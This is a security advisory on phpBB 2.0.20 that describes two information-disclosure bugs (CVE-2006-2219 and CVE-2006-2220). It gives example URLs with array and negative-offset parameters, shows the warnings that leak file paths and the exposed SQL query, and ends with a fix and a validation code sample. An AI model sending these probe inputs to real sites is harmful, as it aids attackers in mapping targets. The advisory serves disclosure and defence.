[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
-Written: 1.5.2006
-Public: 5.5.2006

from SecurityReason.Com
CVE:
- CVE-2006-2219 Full Path Disclosure
- CVE-2006-2220 SQL Errors
=0D
--- 0. Description ---
phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.
Contact the authors at http://www.phpbb.com/about.php.
=0D
--- 1. Full Path Disclosure ---
Many scripts, phpBB among them, share a basic bug: request variables are passed straight into specific PHP functions without checking their type. Take the function htmlspecialchars(), whose implementation parses its arguments like this:

...
if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style, &hint_charset, &hint_charset_len) == FAILURE) {
return;
}
...

As you can see, the argument types are enforced ("s" requires a string). If the variable is anything other than a string (an array, for example), PHP emits a warning, and that warning discloses the full path of the script.
=0D
Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

---Code ---
if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
{
$mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);
}
else
{
$mode = 'joined';
}
---Code ---
=0D
---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486
---Result ---

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

---Result ---
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487

Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486
---Result ---

The problem only appears when display_errors is enabled (display_errors=1), but that is the case on many websites (even at php.net).
=0D
--- 2. SQL Errors ---

The problem appears because any integer value can be appended to the end of the SQL query (the LIMIT clause). The query will fail if the value is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

---Code ---
$start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;
---Code ---

---Result ---
Could not query users

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4

SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

Line : 151
File : memberlist.php
---Result ---
=0D
--- 3. How to fix ---
Turn off display_errors, or validate the type of request variables before use with a function like is_string().
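The following is an added example (not phpBB's own code) of the fix described above: it applies the is_string() check to the "mode" parameter from section 1, clamps the "start" offset from section 2 so the LIMIT clause can never receive a negative value, and keeps PHP warnings out of the response. The request arrays, the allowed mode list and the helper names are constructed for the example.

```php
<?php
// Errors go to the log, never to the response body, so a stray warning
// cannot leak the script path even if a check is missed somewhere.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// "mode" is accepted only if it is a real string from a known list. An
// array (mode[]=cx) or an unknown value falls back to the default instead
// of reaching htmlspecialchars() and triggering the warning shown above.
function safe_mode(array $input, array $allowed, $default = 'joined')
{
    if (!isset($input['mode']) || !is_string($input['mode'])) {
        return $default;
    }
    return in_array($input['mode'], $allowed, true) ? $input['mode'] : $default;
}

// "start" is forced to a non-negative integer, so start=-1 yields
// "LIMIT 0, 50" instead of the invalid "LIMIT -1, 50".
function safe_start(array $input)
{
    $start = isset($input['start']) ? intval($input['start']) : 0;
    return max(0, $start);
}

// Constructed sample requests mirroring the advisory's URLs.
$requests = array(
    array('mode' => array('cx')),   // mode[]=cx: an array, not a string
    array('mode' => 'username'),    // legitimate value
    array('start' => '-1'),         // negative LIMIT offset
    array('start' => '50'),         // legitimate offset
);
$allowed_modes = array('joined', 'username', 'posts');  // assumed list

foreach ($requests as $r) {
    $mode  = safe_mode($r, $allowed_modes);
    $start = safe_start($r);
    $sql = "SELECT username FROM phpbb_users WHERE user_id <> -1 "
         . "ORDER BY user_regdate ASC LIMIT $start, 50";
    echo "mode=" . htmlspecialchars($mode) . " start=$start :: $sql\n";
}
```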
=0D
--- 4. Greets ---
sp3x

Infospec, p_e_a, krasza, revival, l5x

--- 5. Contact ---
Author: SecurityReason.Com [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
SecurityReason.Com